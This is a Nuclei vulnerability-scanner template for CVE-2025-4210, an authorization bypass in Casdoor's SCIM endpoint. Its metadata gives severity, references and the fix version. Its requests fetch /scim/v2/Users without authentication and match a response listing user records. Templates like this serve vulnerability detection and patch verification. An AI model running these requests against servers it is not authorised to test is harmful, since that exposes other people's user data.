id: CVE-2025-4210

info:
  name: Casdoor - Authorization Bypass
  author: theamanrawat
  severity: high
  description: |
    Casdoor up to 1.811.0 contains an authorization bypass caused by manipulation in the HandleScim function in controllers/scim.go, letting remote attackers bypass authorization. Exploitation requires remote access.
  impact: |
    Attackers can bypass authorization, potentially gaining unauthorized access to sensitive data or functionalities.
  remediation: |
    Upgrade to version 1.812.0.
  reference:
    - https://github.com/casdoor/casdoor/commit/3d12ac8dc2282369296c3386815c00a06c6a92fe
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4210
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2025-4210
    epss-score: 0.0617
    epss-percentile: 0.90993
    cwe-id: CWE-285
  metadata:
    verified: true
    max-requests: 2
    vendor: casdoor
    product: casdoor
  tags: cve,cve2025,casdoor,scim,auth-bypass,disclosure,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/scim/v2/Users"
      - "{{BaseURL}}/api/scim/v2/Users"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "schemas"
          - "totalResults"
          - "Resources"
          - "givenName"
        condition: and

      - type: word
        part: header
        words:
          - "application/scim+json"
          - "application/json"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a0046304402207ad5e474ef7493116e16d25ff5e98fb2bc7b3bfe2031cf539c25de4c712f91b70220708a93278b26e965a0f276504d2ae4a8d251bd6ed8f1f2ac4529cc1fe974b428:922c64590222798bb761d5b6d8e72950